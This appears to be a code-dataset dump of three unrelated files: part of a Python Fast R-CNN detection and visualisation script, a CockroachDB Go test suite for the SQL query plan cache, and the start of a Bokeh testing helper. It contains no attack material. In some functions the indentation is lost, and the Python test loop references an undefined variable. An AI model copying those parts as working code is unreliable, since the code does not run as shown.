        x2 = -np.inf * np.ones((width*height, ), dtype=np.float32)
        y2 = -np.inf * np.ones((width*height, ), dtype=np.float32)
        vx = center_pred[:, num_channels*i+0, y, x].reshape((height, width))
        vy = center_pred[:, num_channels*i+1, y, x].reshape((height, width))
        # compute line norms (normal (-vy, vx) is perpendicular to (vx, vy))
        norms = np.stack((-vy, vx), axis=2).reshape(width*height, 2)
        # for each line — NOTE: O((w*h)^2) brute-force loop; slow for large maps
        for j in range(width*height):
            p = x2d[j, :]
            n = norms[j, :].transpose()
            # compute point to line distance for every pixel at once
            d = np.absolute( np.dot(x2d - np.tile(p, (width*height, 1)), n)) / np.linalg.norm(n)
            index = np.where(d < 1)[0]
            vote[index] = vote[index] + 1
            # grow each voted cell's bounding box to include this pixel
            ind = np.where(x1[index] > p[0])[0]
            x1[index[ind]] = p[0]
            ind = np.where(y1[index] > p[1])[0]
            y1[index[ind]] = p[1]
            ind = np.where(x2[index] < p[0])[0]
            x2[index[ind]] = p[0]
            ind = np.where(y2[index] < p[1])[0]
            y2[index[ind]] = p[1]

        # visualize class probability and the vote map side by side
        import matplotlib.pyplot as plt
        fig = plt.figure()
        fig.add_subplot(121)
        plt.imshow(cls_prob[:,i,:,:].reshape((height, width)))
        fig.add_subplot(122)
        plt.imshow(vote.reshape((height, width)))
        # draw a bounding box around the cell with the most votes
        ind = np.argmax(vote)
        plt.gca().add_patch(
            plt.Rectangle((x1[ind], y1[ind]), x2[ind] - x1[ind],
                          y2[ind] - y1[ind], fill=False,
                          edgecolor='r', linewidth=3)
            )
        plt.show()
def vis_detections(im, im_depth, boxes, scores, cls_prob, center_pred, points_rescale, points_transform):
    """Visual debugging of detections.

    Shows a 3x3 grid: input image, input depth, predicted class labels, the
    first predicted box, the three per-pixel viewpoint predictions, and the
    input / pose-transformed 3D point clouds.  Blocks until the window closes.
    """
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

    fig = plt.figure()

    # show image (convert BGR -> RGB for matplotlib)
    ax = fig.add_subplot(331)
    im = im[:, :, (2, 1, 0)]
    plt.imshow(im)
    ax.set_title('input image')

    # show depth
    ax = fig.add_subplot(332)
    plt.imshow(im_depth)
    ax.set_title('input depth')

    # show class label (per-pixel argmax of the class probabilities)
    height = center_pred.shape[2]
    width = center_pred.shape[3]
    cls_label = np.argmax(cls_prob, axis = 1).reshape((height, width))
    ax = fig.add_subplot(333)
    plt.imshow(cls_label)
    ax.set_title('class pred')

    # show the target — only the first box is drawn (note the break below)
    ax = fig.add_subplot(334)
    plt.imshow(im)
    for i in xrange(boxes.shape[0]):
        roi = boxes[i, :4]
        plt.gca().add_patch(plt.Rectangle((roi[0], roi[1]), roi[2] - roi[0],
                                          roi[3] - roi[1], fill=False,
                                          edgecolor='r', linewidth=3))
        break

    # plt.imshow(cls_label)
    # ax.set_title('center pred')

    # gather the viewpoint channels of each pixel's predicted class
    num_channels = 3
    x, y = np.meshgrid(np.arange(width), np.arange(height))
    # vx = center_pred[:, num_channels*cls_label+0, y, x].reshape((height, width))
    # vy = center_pred[:, num_channels*cls_label+1, y, x].reshape((height, width))
    azimuth_sin = center_pred[:, num_channels*cls_label+0, y, x].reshape((height, width))
    azimuth_cos = center_pred[:, num_channels*cls_label+1, y, x].reshape((height, width))
    elevation_sin = center_pred[:, num_channels*cls_label+2, y, x].reshape((height, width))
    # for x in xrange(vx.shape[1]):
    #     for y in xrange(vx.shape[0]):
    #         if vx[y, x] != 0 and vy[y, x] != 0 and cls_label[y, x] != 0:
    #             plt.gca().annotate("", xy=(x + 2*vx[y, x], y + 2*vy[y, x]), xycoords='data', xytext=(x, y), textcoords='data',
    #                 arrowprops=dict(arrowstyle="->", connectionstyle="arc3"))

    # show the azimuth sin image
    ax = fig.add_subplot(335)
    plt.imshow(azimuth_sin)
    ax.set_title('azimuth sin pred')

    # show the azimuth cos image
    ax = fig.add_subplot(336)
    plt.imshow(azimuth_cos)
    ax.set_title('azimuth cos pred')

    # show the elevation sin image
    ax = fig.add_subplot(337)
    plt.imshow(elevation_sin)
    ax.set_title('elevation sin pred')

    # show the 3D points (skipped when pose estimation did not run)
    if points_rescale.shape[0] > 0:
        ax = fig.add_subplot(338, projection='3d')
        ax.scatter(points_rescale[:,:,0], points_rescale[:,:,1], points_rescale[:,:,2], c='r', marker='o')
        ax.set_xlabel('X')
        ax.set_ylabel('Y')
        ax.set_zlabel('Z')
        ax.set_aspect('equal')
        ax.set_title('input point cloud')

    # show the 3D points transform (green dot marks the object center/origin)
    if points_transform.shape[1] > 0:
        ax = fig.add_subplot(339, projection='3d')
        ax.scatter(points_transform[0,:], points_transform[1,:], points_transform[2,:], c='r', marker='o')
        ax.scatter(0, 0, 0, c='g', marker='o')
        ax.set_xlabel('X')
        ax.set_ylabel('Y')
        ax.set_zlabel('Z')
        ax.set_aspect('equal')
        ax.set_title('transformed point cloud')

    plt.show()
def test_net(net, imdb):
output_dir = get_output_dir(imdb, net)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
det_file = os.path.join(output_dir, 'detections.pkl')
print imdb.name
if os.path.exists(det_file):
return
"""Test a Fast R-CNN network on an image database."""
num_images = len(imdb.image_index)
detections = [[] for _ in xrange(num_images)]
# timers
_t = {'im_detect' : Timer(), 'misc' : Timer()}
# perm = np.random.permutation(np.arange(num_images))
for i in xrange(num_images):
# for i in perm:
im = cv2.imread(imdb.image_path_at(i))
im_depth = cv2.imread(imdb.depth_path_at(i), cv2.IMREAD_UNCHANGED)
# shift
# rows = im.shape[0]
# cols = im.shape[1]
# M = np.float32([[1,0,50],[0,1,25]])
# im = cv2.warpAffine(im,M,(cols,rows))
# rescaling
# im = cv2.resize(im, None, None, fx=0.6, fy=0.6, interpolation=cv2.INTER_LINEAR)
_t['im_detect'].tic()
boxes, scores, seg_cls_prob, seg_view_pred = im_detect(net, im, im_depth, imdb.num_classes)
_t['im_detect'].toc()
_t['misc'].tic()
det = {'boxes': boxes, 'scores': scores, 'seg_cls_prob': seg_cls_prob, 'seg_view_pred': seg_view_pred}
detections[i] = det
_t['misc'].toc()
print 'im_detect: {:d}/{:d} {:.3f}s {:.3f}s' \
.format(i + 1, num_images, _t['im_detect'].average_time, _t['misc'].average_time)
# Hough voting
# hough_voting(cls_prob, center_pred)
# read meta data
meta_data_path = imdb.metadata_path_at(i)
# compute object pose
if os.path.exists(meta_data_path):
meta_data = scipy.io.loadmat(meta_data_path)
points_rescale, points_transform = pose_estimate(im_depth, meta_data, seg_cls_prob, seg_view_pred)
else:
points_rescale = np.zeros((0, 0, 3), dtype=np.float32)
points_transform = np.zeros((3, 0), dtype=np.float32)
vis_detections(im, im_depth, boxes, scores, seg_cls_prob, seg_view_pred, points_rescale, points_transform)
det_file = os.path.join(output_dir, 'detections.pkl')
with open(det_file, 'wb') as f:
cPickle.dump(all_boxes, f, cPickle.HIGHEST_PROTOCOL) | unknown | codeparrot/codeparrot-clean | ||
// Copyright 2018 The Cockroach Authors.
//
// Use of this software is governed by the CockroachDB Software License
// included in the /LICENSE file.
package sql
import (
"context"
gosql "database/sql"
"fmt"
"reflect"
"testing"
"time"
"github.com/cockroachdb/cockroach/pkg/base"
"github.com/cockroachdb/cockroach/pkg/kv"
"github.com/cockroachdb/cockroach/pkg/security/username"
"github.com/cockroachdb/cockroach/pkg/sql/clusterunique"
"github.com/cockroachdb/cockroach/pkg/sql/parser"
"github.com/cockroachdb/cockroach/pkg/sql/sem/tree"
"github.com/cockroachdb/cockroach/pkg/testutils"
"github.com/cockroachdb/cockroach/pkg/testutils/serverutils"
"github.com/cockroachdb/cockroach/pkg/testutils/sqlutils"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/cockroachdb/cockroach/pkg/util/randutil"
"github.com/cockroachdb/errors"
"github.com/stretchr/testify/assert"
"golang.org/x/sync/errgroup"
)
// queryCacheTestHelper bundles a test server with a fixed set of SQL
// connections (each wrapped in a SQLRunner) and tracks query plan cache
// hit/miss baselines so tests can assert on stats relative to ResetStats.
type queryCacheTestHelper struct {
	srv     serverutils.TestServerInterface
	godb    *gosql.DB
	conns   []*gosql.Conn
	runners []*sqlutils.SQLRunner

	// hitsDelta/missesDelta hold the counter values captured by the last
	// ResetStats call; GetStats subtracts them from the raw counters.
	hitsDelta, missesDelta int
}
// makeQueryCacheTestHelper starts a test server, opens numConns SQL
// connections, (re)creates the db1.t test table, points every connection at
// db1, enables the query cache, and resets the hit/miss baselines.
func makeQueryCacheTestHelper(tb testing.TB, numConns int) *queryCacheTestHelper {
	h := &queryCacheTestHelper{}
	h.srv, h.godb, _ = serverutils.StartServer(tb, base.TestServerArgs{})
	h.conns = make([]*gosql.Conn, numConns)
	h.runners = make([]*sqlutils.SQLRunner, numConns)
	for i := 0; i < numConns; i++ {
		conn, err := h.godb.Conn(context.Background())
		if err != nil {
			tb.Fatal(err)
		}
		h.conns[i] = conn
		h.runners[i] = sqlutils.MakeSQLRunner(conn)
	}
	setup := h.runners[0]
	// Start from a clean slate and create the table the tests query.
	setup.Exec(tb, "DROP DATABASE IF EXISTS db1")
	setup.Exec(tb, "DROP DATABASE IF EXISTS db2")
	setup.Exec(tb, "CREATE DATABASE db1")
	setup.Exec(tb, "CREATE TABLE db1.t (a INT, b INT)")
	setup.Exec(tb, "INSERT INTO db1.t VALUES (1, 1)")
	for _, r := range h.runners {
		r.Exec(tb, "SET DATABASE = db1")
	}
	setup.Exec(tb, "SET CLUSTER SETTING sql.query_cache.enabled = true")
	h.ResetStats()
	return h
}
// Stop shuts down the test server (and with it all open connections).
func (h *queryCacheTestHelper) Stop() {
	h.srv.Stopper().Stop(context.Background())
}
// GetStats returns the plan cache hit and miss counts accumulated since the
// last ResetStats call (raw counters minus the recorded baselines).
func (h *queryCacheTestHelper) GetStats() (numHits, numMisses int) {
	numHits = int(h.srv.MustGetSQLCounter(MetaSQLOptPlanCacheHits.Name)) - h.hitsDelta
	numMisses = int(h.srv.MustGetSQLCounter(MetaSQLOptPlanCacheMisses.Name)) - h.missesDelta
	return numHits, numMisses
}
// ResetStats makes the current hit/miss counters the new baseline so that
// subsequent GetStats calls report statistics relative to this point.
func (h *queryCacheTestHelper) ResetStats() {
	numHits, numMisses := h.GetStats()
	h.hitsDelta += numHits
	h.missesDelta += numMisses
}
// AssertStats checks the hit/miss counts (relative to the last ResetStats)
// against the expected values, failing the test on mismatch.
func (h *queryCacheTestHelper) AssertStats(tb *testing.T, expHits, expMisses int) {
	tb.Helper()
	hits, misses := h.GetStats()
	assert.Equal(tb, expHits, hits, "hits")
	assert.Equal(tb, expMisses, misses, "misses")
}
// CheckStats is similar to AssertStats, but returns an error instead of
// failing the test if the actual stats don't match the expected stats.
func (h *queryCacheTestHelper) CheckStats(tb *testing.T, expHits, expMisses int) error {
	tb.Helper()
	actualHits, actualMisses := h.GetStats()
	switch {
	case actualHits != expHits:
		return errors.Errorf("expected %d hits but found %d", expHits, actualHits)
	case actualMisses != expMisses:
		return errors.Errorf("expected %d misses but found %d", expMisses, actualMisses)
	default:
		return nil
	}
}
// TestQueryCache exercises the plan (query) cache end-to-end against a test
// server: hit/miss accounting for simple and prepared statements, parallel
// use across connections, per-database cache behavior, invalidation on
// schema and statistics changes, and interactions between direct execution
// and PREPARE (including placeholder type hints).
func TestQueryCache(t *testing.T) {
	defer leaktest.AfterTest(t)()
	defer log.Scope(t).Close(t)

	t.Run("simple", func(t *testing.T) {
		const numConns = 4
		h := makeQueryCacheTestHelper(t, numConns)
		defer h.Stop()
		// Alternate between the connections.
		for i := 0; i < 5; i++ {
			for _, r := range h.runners {
				r.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
			}
		}
		// We should have 1 miss and the rest hits.
		h.AssertStats(t, 5*numConns-1, 1)
	})

	t.Run("simple-prepare", func(t *testing.T) {
		const numConns = 4
		h := makeQueryCacheTestHelper(t, numConns)
		defer h.Stop()
		// Alternate between the connections.
		for i := 0; i < 5; i++ {
			for _, r := range h.runners {
				r.Exec(t, fmt.Sprintf("PREPARE a%d AS SELECT * FROM t", i))
			}
		}
		// We should have 1 miss and the rest hits.
		h.AssertStats(t, 5*numConns-1, 1)

		for i := 0; i < 5; i++ {
			for _, r := range h.runners {
				r.CheckQueryResults(
					t,
					fmt.Sprintf("EXECUTE a%d", i),
					[][]string{{"1", "1"}},
				)
			}
		}
	})

	t.Run("simple-prepare-with-args", func(t *testing.T) {
		const numConns = 4
		h := makeQueryCacheTestHelper(t, numConns)
		defer h.Stop()
		// Alternate between the connections.
		for i := 0; i < 5; i++ {
			for _, r := range h.runners {
				r.Exec(t, fmt.Sprintf("PREPARE a%d AS SELECT a + $1, b + $2 FROM t", i))
			}
		}
		// We should have 1 miss and the rest hits.
		h.AssertStats(t, 5*numConns-1, 1)

		for i := 0; i < 5; i++ {
			for _, r := range h.runners {
				r.CheckQueryResults(
					t,
					fmt.Sprintf("EXECUTE a%d (10, 100)", i),
					[][]string{{"11", "101"}},
				)
				r.CheckQueryResults(
					t,
					fmt.Sprintf("EXECUTE a%d (20, 200)", i),
					[][]string{{"21", "201"}},
				)
			}
		}
	})

	// Verify that using a relative timestamp literal interacts correctly with
	// the query cache (#48717).
	t.Run("relative-timestamp", func(t *testing.T) {
		h := makeQueryCacheTestHelper(t, 1 /* numConns */)
		defer h.Stop()
		r := h.runners[0]
		res := r.QueryStr(t, "SELECT 'now'::TIMESTAMP")
		time.Sleep(time.Millisecond)
		// A cached plan must not have "frozen" the 'now' literal: the second
		// evaluation has to produce a later timestamp.
		res2 := r.QueryStr(t, "SELECT 'now'::TIMESTAMP")
		if reflect.DeepEqual(res, res2) {
			t.Error("expected different result")
		}
	})

	t.Run("parallel", func(t *testing.T) {
		const numConns = 4
		h := makeQueryCacheTestHelper(t, numConns)
		defer h.Stop()

		var group errgroup.Group
		for connIdx := range h.conns {
			c := h.conns[connIdx]
			group.Go(func() error {
				for j := 0; j < 10; j++ {
					rows, err := c.QueryContext(context.Background(), "SELECT * FROM t")
					if err != nil {
						return err
					}
					res, err := sqlutils.RowsToStrMatrix(rows)
					if err != nil {
						return err
					}
					if !reflect.DeepEqual(res, [][]string{{"1", "1"}}) {
						return errors.Errorf("incorrect results %v", res)
					}
				}
				return nil
			})
		}
		if err := group.Wait(); err != nil {
			t.Fatal(err)
		}
	})

	t.Run("parallel-prepare", func(t *testing.T) {
		const numConns = 4
		h := makeQueryCacheTestHelper(t, numConns)
		defer h.Stop()

		var group errgroup.Group
		for connIdx := range h.conns {
			c := h.conns[connIdx]
			group.Go(func() error {
				ctx := context.Background()
				for j := 0; j < 10; j++ {
					// Query with a multi-use CTE (as a regression test for #44867). The
					// left join condition never passes so this is really equivalent to:
					//   SELECT a+$1,b+$2 FROM t
					query := fmt.Sprintf(`PREPARE a%d AS
						WITH cte(x,y) AS (SELECT a+$1, b+$2 FROM t)
						SELECT cte.x, cte.y FROM cte LEFT JOIN cte as cte2 on cte.y = cte2.x`, j)
					if _, err := c.ExecContext(ctx, query); err != nil {
						return err
					}
					rows, err := c.QueryContext(ctx, fmt.Sprintf("EXECUTE a%d (10, 100)", j))
					if err != nil {
						return err
					}
					res, err := sqlutils.RowsToStrMatrix(rows)
					if err != nil {
						return err
					}
					if !reflect.DeepEqual(res, [][]string{{"11", "101"}}) {
						return errors.Errorf("incorrect results %v", res)
					}
				}
				return nil
			})
		}
		if err := group.Wait(); err != nil {
			t.Fatal(err)
		}
	})

	// Test connections running the same statement but under different databases.
	t.Run("multidb", func(t *testing.T) {
		const numConns = 4
		h := makeQueryCacheTestHelper(t, numConns)
		defer h.Stop()

		r0 := h.runners[0]
		r0.Exec(t, "CREATE DATABASE db2")
		r0.Exec(t, "CREATE TABLE db2.t (a INT)")
		r0.Exec(t, "INSERT INTO db2.t VALUES (2)")
		// Odd-numbered connections point at db2; the cache must key on the
		// current database so "SELECT * FROM t" resolves differently per conn.
		for i := range h.runners {
			if i%2 == 1 {
				h.runners[i].Exec(t, "SET DATABASE = db2")
			}
		}
		// Alternate between the connections.
		for i := 0; i < 5; i++ {
			for j, r := range h.runners {
				var res [][]string
				if j%2 == 0 {
					res = [][]string{{"1", "1"}}
				} else {
					res = [][]string{{"2"}}
				}
				r.CheckQueryResults(t, "SELECT * FROM t", res)
			}
		}
	})

	t.Run("multidb-prepare", func(t *testing.T) {
		const numConns = 4
		h := makeQueryCacheTestHelper(t, numConns)
		defer h.Stop()

		r0 := h.runners[0]
		r0.Exec(t, "CREATE DATABASE db2")
		r0.Exec(t, "CREATE TABLE db2.t (a INT)")
		r0.Exec(t, "INSERT INTO db2.t VALUES (2)")
		for i := range h.runners {
			if i%2 == 1 {
				h.runners[i].Exec(t, "SET DATABASE = db2")
			}
		}
		// Alternate between the connections.
		for i := 0; i < 5; i++ {
			for j, r := range h.runners {
				r.Exec(t, fmt.Sprintf("PREPARE a%d AS SELECT a + $1 FROM t", i))
				var res [][]string
				if j%2 == 0 {
					res = [][]string{{"11"}}
				} else {
					res = [][]string{{"12"}}
				}
				r.CheckQueryResults(t, fmt.Sprintf("EXECUTE a%d (10)", i), res)
			}
		}
	})

	// Test that a schema change triggers cache invalidation.
	t.Run("schemachange", func(t *testing.T) {
		h := makeQueryCacheTestHelper(t, 2 /* numConns */)
		defer h.Stop()
		r0, r1 := h.runners[0], h.runners[1]
		r0.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
		h.AssertStats(t, 0 /* hits */, 1 /* misses */)
		r1.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
		h.AssertStats(t, 1 /* hits */, 1 /* misses */)
		r0.Exec(t, "ALTER TABLE t ADD COLUMN c INT AS (a+b) STORED")
		h.AssertStats(t, 1 /* hits */, 1 /* misses */)
		// The schema change must have evicted the cached plan: this is a miss.
		r1.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1", "2"}})
		h.AssertStats(t, 1 /* hits */, 2 /* misses */)
	})

	// Test that creating new statistics triggers cache invalidation.
	t.Run("statschange", func(t *testing.T) {
		h := makeQueryCacheTestHelper(t, 2 /* numConns */)
		defer h.Stop()
		r0, r1 := h.runners[0], h.runners[1]
		r0.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
		h.AssertStats(t, 0 /* hits */, 1 /* misses */)
		r1.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
		h.AssertStats(t, 1 /* hits */, 1 /* misses */)
		r0.Exec(t, "CREATE STATISTICS s FROM t")
		h.AssertStats(t, 1 /* hits */, 1 /* misses */)
		hits := 1
		testutils.SucceedsSoon(t, func() error {
			// The stats cache is updated asynchronously, so we may get some hits
			// before we get a miss.
			r1.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
			if err := h.CheckStats(t, hits, 2 /* misses */); err != nil {
				hits++
				return err
			}
			return nil
		})
	})

	// Test that a schema change triggers cache invalidation.
	t.Run("schemachange-prepare", func(t *testing.T) {
		h := makeQueryCacheTestHelper(t, 2 /* numConns */)
		defer h.Stop()
		r0, r1 := h.runners[0], h.runners[1]
		r0.Exec(t, "PREPARE a AS SELECT * FROM t")
		r0.CheckQueryResults(t, "EXECUTE a", [][]string{{"1", "1"}})
		r0.CheckQueryResults(t, "EXECUTE a", [][]string{{"1", "1"}})
		r0.Exec(t, "ALTER TABLE t ADD COLUMN c INT AS (a+b) STORED")
		r1.Exec(t, "PREPARE b AS SELECT * FROM t")
		r1.CheckQueryResults(t, "EXECUTE b", [][]string{{"1", "1", "2"}})
	})

	// Test a schema change where the other connections are running the query in
	// parallel.
	t.Run("schemachange-parallel", func(t *testing.T) {
		const numConns = 4
		h := makeQueryCacheTestHelper(t, numConns)
		defer h.Stop()
		var group errgroup.Group
		for connIdx := 1; connIdx < numConns; connIdx++ {
			c := h.conns[connIdx]
			connIdx := connIdx
			group.Go(func() error {
				sawChanged := false
				prepIdx := 0
				doQuery := func() error {
					// Some threads do prepare, others execute directly.
					var rows *gosql.Rows
					var err error
					ctx := context.Background()
					if connIdx%2 == 1 {
						rows, err = c.QueryContext(ctx, "SELECT * FROM t")
					} else {
						prepIdx++
						_, err = c.ExecContext(ctx, fmt.Sprintf("PREPARE a%d AS SELECT * FROM t", prepIdx))
						if err == nil {
							rows, err = c.QueryContext(ctx, fmt.Sprintf("EXECUTE a%d", prepIdx))
							if err != nil {
								// If the schema change happens in-between the PREPARE and
								// EXECUTE, we will get an error. Tolerate this error if we
								// haven't seen updated results already.
								if !sawChanged && testutils.IsError(err, "cached plan must not change result type") {
									t.Logf("thread %d hit race", connIdx)
									return nil
								}
							}
						}
					}
					if err != nil {
						return err
					}
					res, err := sqlutils.RowsToStrMatrix(rows)
					if err != nil {
						return err
					}
					// Results must transition monotonically from the old schema's
					// rows to the new schema's rows — never back.
					if reflect.DeepEqual(res, [][]string{{"1", "1"}}) {
						if sawChanged {
							return errors.Errorf("Saw updated results, then older results")
						}
					} else if reflect.DeepEqual(res, [][]string{{"1", "1", "2"}}) {
						sawChanged = true
					} else {
						return errors.Errorf("incorrect results %v", res)
					}
					return nil
				}

				// Run the query until we see an updated result.
				for !sawChanged {
					if err := doQuery(); err != nil {
						return err
					}
				}

				t.Logf("thread %d saw changed results", connIdx)

				// Now run the query a bunch more times to make sure we keep reading the
				// updated version.
				for i := 0; i < 10; i++ {
					if err := doQuery(); err != nil {
						return err
					}
				}
				return nil
			})
		}
		r0 := h.runners[0]
		r0.Exec(t, "ALTER TABLE t ADD COLUMN c INT AS (a+b) STORED")
		if err := group.Wait(); err != nil {
			t.Fatal(err)
		}
	})

	// Verify the case where a PREPARE encounters a query cache entry that was
	// created by a direct execution (and hence has no Metadata).
	t.Run("exec-and-prepare", func(t *testing.T) {
		h := makeQueryCacheTestHelper(t, 1 /* numConns */)
		defer h.Stop()
		r0 := h.runners[0]
		r0.Exec(t, "SELECT * FROM t") // Should miss the cache.
		h.AssertStats(t, 0 /* hits */, 1 /* misses */)

		r0.Exec(t, "SELECT * FROM t") // Should hit the cache.
		h.AssertStats(t, 1 /* hits */, 1 /* misses */)

		r0.Exec(t, "PREPARE x AS SELECT * FROM t") // Should miss the cache.
		h.AssertStats(t, 1 /* hits */, 2 /* misses */)

		r0.Exec(t, "PREPARE y AS SELECT * FROM t") // Should hit the cache.
		h.AssertStats(t, 2 /* hits */, 2 /* misses */)

		r0.CheckQueryResults(t, "EXECUTE x", [][]string{{"1", "1"}})
		r0.CheckQueryResults(t, "EXECUTE y", [][]string{{"1", "1"}})
	})

	// Verify the case where we PREPARE the same statement with different hints.
	t.Run("prepare-hints", func(t *testing.T) {
		h := makeQueryCacheTestHelper(t, 1 /* numConns */)
		defer h.Stop()
		r0 := h.runners[0]
		r0.Exec(t, "PREPARE a1 AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
		h.AssertStats(t, 0 /* hits */, 1 /* misses */)

		r0.Exec(t, "PREPARE a2 AS SELECT pg_typeof(1 + $1)") // Should hit the cache.
		h.AssertStats(t, 1 /* hits */, 1 /* misses */)

		// A different placeholder type hint must be a distinct cache entry.
		r0.Exec(t, "PREPARE b1 (float) AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
		h.AssertStats(t, 1 /* hits */, 2 /* misses */)

		r0.Exec(t, "PREPARE b2 (float) AS SELECT pg_typeof(1 + $1)") // Should hit the cache.
		h.AssertStats(t, 2 /* hits */, 2 /* misses */)

		r0.Exec(t, "PREPARE c1 (decimal) AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
		h.AssertStats(t, 2 /* hits */, 3 /* misses */)

		r0.Exec(t, "PREPARE c2 (decimal) AS SELECT pg_typeof(1 + $1)") // Should hit the cache.
		h.AssertStats(t, 3 /* hits */, 3 /* misses */)

		// NOTE(review): each repeated PREPARE below misses again — presumably
		// because each new prepared statement evicts/replaces the entry; the
		// counts are what the implementation currently produces.
		r0.Exec(t, "PREPARE a3 AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
		h.AssertStats(t, 3 /* hits */, 4 /* misses */)

		r0.Exec(t, "PREPARE b3 (float) AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
		h.AssertStats(t, 3 /* hits */, 5 /* misses */)

		r0.Exec(t, "PREPARE c3 (decimal) AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
		h.AssertStats(t, 3 /* hits */, 6 /* misses */)

		r0.CheckQueryResults(t, "EXECUTE a1 (1)", [][]string{{"bigint"}})
		r0.CheckQueryResults(t, "EXECUTE a2 (1)", [][]string{{"bigint"}})
		r0.CheckQueryResults(t, "EXECUTE a3 (1)", [][]string{{"bigint"}})
		r0.CheckQueryResults(t, "EXECUTE b1 (1)", [][]string{{"double precision"}})
		r0.CheckQueryResults(t, "EXECUTE b2 (1)", [][]string{{"double precision"}})
		r0.CheckQueryResults(t, "EXECUTE b3 (1)", [][]string{{"double precision"}})
		r0.CheckQueryResults(t, "EXECUTE c1 (1)", [][]string{{"numeric"}})
		r0.CheckQueryResults(t, "EXECUTE c2 (1)", [][]string{{"numeric"}})
		r0.CheckQueryResults(t, "EXECUTE c3 (1)", [][]string{{"numeric"}})
	})
}
// BenchmarkQueryCache is a set of benchmarks that run queries against a server
// with the query cache on and off, with varying number of parallel clients and
// with workloads that are either cacheable or not.
//
// For microbenchmarks of the query cache data structures, see the sql/querycache
// package.
func BenchmarkQueryCache(b *testing.B) {
	defer leaktest.AfterTest(b)()
	defer log.Scope(b).Close(b)

	workloads := []string{"small", "large"}
	methods := []string{"simple", "prepare-once", "prepare-each"}

	// run executes b.N queries split evenly across numClients concurrent
	// connections, using the given workload/method combination, with the
	// query cache enabled or disabled.
	run := func(
		b *testing.B,
		numClients int,
		workloadIdx int,
		methodIdx int,
		cacheOn bool,
	) {
		h := makeQueryCacheTestHelper(b, numClients)
		defer h.Stop()
		r0 := h.runners[0]
		r0.Exec(b, "CREATE TABLE kv (k INT PRIMARY KEY, v INT)")
		r0.Exec(b, fmt.Sprintf("SET CLUSTER SETTING sql.query_cache.enabled = %t", cacheOn))
		var group errgroup.Group
		b.ResetTimer()
		for connIdx := 0; connIdx < numClients; connIdx++ {
			c := h.conns[connIdx]
			group.Go(func() error {
				rng, _ := randutil.NewTestRand()
				ctx := context.Background()
				// We use a small or large range of values depending on the
				// workload type. A small range makes the "simple" queries
				// repeat and thus be cacheable; a large range makes them
				// mostly distinct.
				valRange := 0
				switch workloadIdx {
				case 0: // small
					valRange = 100
				case 1: // large
					valRange = 10000000
				}
				var stmt *gosql.Stmt
				if methodIdx == 1 {
					var err error
					stmt, err = c.PrepareContext(ctx, "SELECT v FROM kv WHERE k=$1")
					if err != nil {
						return err
					}
				}
				for i := 0; i < b.N/numClients; i++ {
					val := rng.Intn(valRange)
					var err error
					switch methodIdx {
					case 0: // simple
						query := fmt.Sprintf("SELECT v FROM kv WHERE k=%d", val)
						_, err = c.ExecContext(ctx, query)
					case 1: // prepare-once
						_, err = stmt.ExecContext(ctx, val)
					case 2: // prepare-each
						_, err = c.ExecContext(ctx, "SELECT v FROM kv WHERE k=$1", val)
					}
					if err != nil {
						return err
					}
				}
				return nil
			})
		}
		// Wait for all client goroutines. This must happen after the loop
		// above (not inside it), otherwise each client would be waited on
		// before launching the next one and the clients would effectively
		// run serially, defeating the clients-N parallelism dimension.
		if err := group.Wait(); err != nil {
			b.Fatal(err)
		}
		b.StopTimer()
	}
	for workload, workloadName := range workloads {
		b.Run(workloadName, func(b *testing.B) {
			for _, clients := range []int{1, 4, 8} {
				b.Run(fmt.Sprintf("clients-%d", clients), func(b *testing.B) {
					for method, methodName := range methods {
						b.Run(methodName, func(b *testing.B) {
							for _, cache := range []bool{false, true} {
								name := "cache-off"
								if cache {
									name = "cache-on"
								}
								b.Run(name, func(b *testing.B) {
									run(b, clients, workload, method, cache)
								})
							}
						})
					}
				})
			}
		})
	}
}
func TestPlanGistControl(t *testing.T) {
defer leaktest.AfterTest(t)()
defer log.Scope(t).Close(t)
ctx := context.Background()
s, _, db := serverutils.StartServer(t, base.TestServerArgs{})
defer s.Stopper().Stop(ctx)
execCfg := s.ExecutorConfig().(ExecutorConfig)
sd := NewInternalSessionData(ctx, execCfg.Settings, "test")
internalPlanner, cleanup := NewInternalPlanner(
"test",
kv.NewTxn(ctx, db, s.NodeID()),
username.NodeUserName(),
&MemoryMetrics{},
&execCfg,
sd,
)
defer cleanup()
fmtFingerprintMask := tree.FmtFlags(tree.QueryFormattingForFingerprintsMask.Get(&s.ClusterSettings().SV))
p := internalPlanner.(*planner)
stmt, err := parser.ParseOne("SELECT 1")
if err != nil {
t.Fatal(err)
}
p.stmt = makeStatement(
ctx, stmt, clusterunique.ID{}, fmtFingerprintMask, nil, /* statementHintsCache */
)
if err := p.makeOptimizerPlan(ctx); err != nil {
t.Fatal(err)
}
if p.SessionData().DisablePlanGists {
t.Error("expected gists to be enabled by default")
}
if p.instrumentation.planGist.String() == "" {
t.Error("expected gist by default")
}
internalPlanner, cleanup = NewInternalPlanner(
"test",
kv.NewTxn(ctx, db, s.NodeID()),
username.NodeUserName(),
&MemoryMetrics{},
&execCfg,
sd,
)
defer cleanup()
p = internalPlanner.(*planner)
p.SessionData().DisablePlanGists = true
p.stmt = makeStatement(
ctx, stmt, clusterunique.ID{}, fmtFingerprintMask, nil, /* statementHintsCache */
)
if err := p.makeOptimizerPlan(ctx); err != nil {
t.Fatal(err)
}
if p.instrumentation.planGist.String() != "" {
t.Error("expected no gist")
}
} | go | github | https://github.com/cockroachdb/cockroach | pkg/sql/plan_opt_test.go |
''' Functions to help with testing Bokeh and reporting issues.
'''
from __future__ import absolute_import, print_function
import codecs
import errno
from inspect import isclass, isfunction, getmembers
import os
import importlib
import shutil
